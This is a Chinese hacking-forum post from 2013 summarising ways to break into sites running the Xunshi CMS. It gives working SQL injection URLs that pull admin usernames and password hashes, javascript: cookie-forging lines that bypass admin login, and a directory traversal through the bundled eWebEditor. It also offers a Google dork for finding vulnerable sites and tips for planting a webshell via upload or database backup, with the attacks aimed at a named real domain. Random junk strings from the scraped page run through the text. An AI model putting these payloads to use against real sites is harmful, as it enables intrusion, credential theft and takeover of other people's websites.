找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2528|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘9 r# G1 J5 e/ Y9 y
( s" S3 j$ ~5 b. q  a6 C! s) B
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
0 e- S7 ~( k0 W1 {/ F1 y, A- L6 c" t' l, [
以下本文总结来自黑防去年第9期杂志上的内容...7 m/ @& S6 B6 @! t" Y4 Z
9 g7 o# e. T! L$ u8 m3 Q/ q. d' r6 I1 S
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
. K2 X+ s1 d3 P$ l  T" I+ e  r" K9 N# c4 p$ C  s. ?2 |% J
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 ( {0 f& @" |4 j) Q. T( C
# |4 X( U+ |) I  c
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况& j8 b3 {1 H3 R; a  J1 U
这里一个注入
' R; c6 N5 H6 Q
3 u9 R( C' m: o5 `% w4 C效果如图:3 C. z3 V" }% s7 V" D7 p. s- T

# M# b- J! S3 J, _4 I& g
9 C# O, x1 t' v" n
5 h0 |, G% c& L( H" S这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
! H; G- s9 U+ W& \, O+ c; R$ e! L- `! C$ ~, i! k0 Z
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
$ G! B' w2 U, V  l/ T; u4 r8 T. b# {# J' U' w# j
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));- O- a5 [8 Z$ s; r7 ^# [

% Y6 U8 [/ e/ U; X8 c" O" R那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
4 @2 F5 B) z5 J% G: L1 f
: w: u: Y4 x& z5 n8 q$ Z因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞* [% w: M0 X/ U

5 y* ~6 N+ K& s2 b$ W0 {4 j它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
% }  P4 G9 k% M, c6 t" ]4 k3 X4 s+ O8 n
访问这页面来列目录..步骤如下:) p4 Z1 z0 Q/ Y6 t
5 ?+ \$ T, C9 y# k( d! P6 [# S) B. ]
javascript:alert(document.cookie="admindj=1") - F- K8 K' t3 a, c8 Y" c! z( p

' e1 a# q6 K$ F) F; ?' ^http://www.political-security.co ... asp?id=46&dir=../... d( M0 N# Z8 f) Q6 C

! p+ {9 M! D6 ?$ \: c- ~3 {: N效果如图:. z) E, m, W: I/ N

5 u; X* \1 A5 h6 W: V: ^7 h0 c
3 d* }  E$ L* f: x' N# o; ], M/ M; c! x
这样全站目录都能瞧了..找到后台目录..进去..
+ G8 g! Y/ a7 z# y
" N& r; y- o1 T( F, F7 L那么进了后台怎么拿shell??上传--备份就ok了..( N) c6 C% p  ~9 W1 d( N
* e. @5 f) u* ^( {/ N! \
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..( @9 N- \# n% R$ I5 J) H

' ~: |$ p- U/ I# y这个我也碰到过一次..你都可以通过列目录来实现..
& ~  C9 Q( P) V. Z
6 h7 c0 a( X+ |+ O: a8 @javascript:alert(document.cookie="admindj=1") ' L: `; J4 h0 ~: c5 T4 C
) G0 @# S) _2 b' _7 x  c. |8 p
http://www.political-security.co ... p?action=BackupData
9 t2 J! g7 _4 o- E) B3 W$ v+ w4 R! A. U0 m" [) y0 R) e
备份ok..3 d2 v- q% t7 x0 Q. @7 O$ R
( T. o. B" m4 h# t1 M
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?: l) c8 R2 k* |" Z' Z% j3 D. a

8 y* ]$ E" O2 x在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下6 ?) \1 b" E, K% I

2 x; w- @) M# j- R4 L, L% f- w然后访问此页面进行注入..步骤如下:" D# C" S" y. k  @& z

  L/ x, p- V+ I3 X- ]javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")0 m' |3 j4 H9 q6 x1 [0 q, q- G
7 j3 t; s+ T1 ~% V& F- B
然后请求admin/admin_chk.asp页面
- s- P" B$ v/ i' e  w0 j( Z" Z* p9 I1 r" p
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%8 L7 i2 u9 n5 _2 U7 B- V' F
! D7 \- f  i6 O
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
5 B$ j; E  a! T8 d1 k4 ~, J  a$ f6 K; |) v7 l" G
效果如图所示:
- b9 g4 p+ z/ l5 }8 z9 _
! b, ]. R! s- y  U6 h  [+ |: S
( I( |0 p* l6 t2 b, j9 s5 i4 q% X
讯时漏洞2
8 K0 u7 z/ {7 x$ v+ n: U. ngoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
* w+ M% p: @' ~3 z: r; I
! `" i2 Q! x! A0 `1、/admin/admin_news_pl_view.asp?id=1: L# M; l2 S7 I' l) I5 }: j
//id任意 填入以下语句
( n+ `' `" i/ b5 b8 W+ B* I$ E/ y
/ s: S/ F6 X1 m3 }4 y- j$ Y2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
# e! |6 Q$ R; ~& b) ^  a
: p3 m# h% w" K7 O( a& r7 z) S9 b
- O8 Y/ j; q9 Z1 w) Y# l
" \8 o1 N7 D# E1 h' n; B3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='$ b% j. K+ Q: p6 y; J. |

  d, ?7 ]) ]6 g0 P8 H
3 W' i5 |0 j5 K
3 W3 z  a& y9 ^* ]& j爆出管理员帐号和密码了
5 v6 w# I( d- E8 a6 j$ O0 A0 O* Z2 z0 X
, \- H  I: C- N
, F/ U+ {$ w3 h4 A+ p
3 ^  _9 C" s5 K* @' `- U4、cookies进后台
7 Q8 |  U" F0 q( ` 7 R) h0 D! o' W  `$ Q7 ^8 s  }5 F  X
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));4 l( @3 T/ Y. [. o
* m" j/ m7 k% T$ k( I6 h

* i( r3 F7 w4 f4 j- p" V# h- i* B. s3 g5 B
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!- \6 g4 L( Q5 Y
# ?+ x+ ~4 J, ^# R4 d. \' c" a

% w7 o8 v' I, Q
/ G7 s; s2 ~  k5 B2 Q& J* n1 T6、后台有上传和备份取SHELL不难。* ~+ K$ c0 R' B
* y  H8 g/ F: V  g6 ~
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..6 }" l" d3 e% W* b- u
' s2 p, n' @! C5 x. o# F
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
/ A) p' V& w. Y
. p; U0 N2 a; r# j
. ]( t8 q  C  t' ?% u; H& X
* ~8 U/ e' o% h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表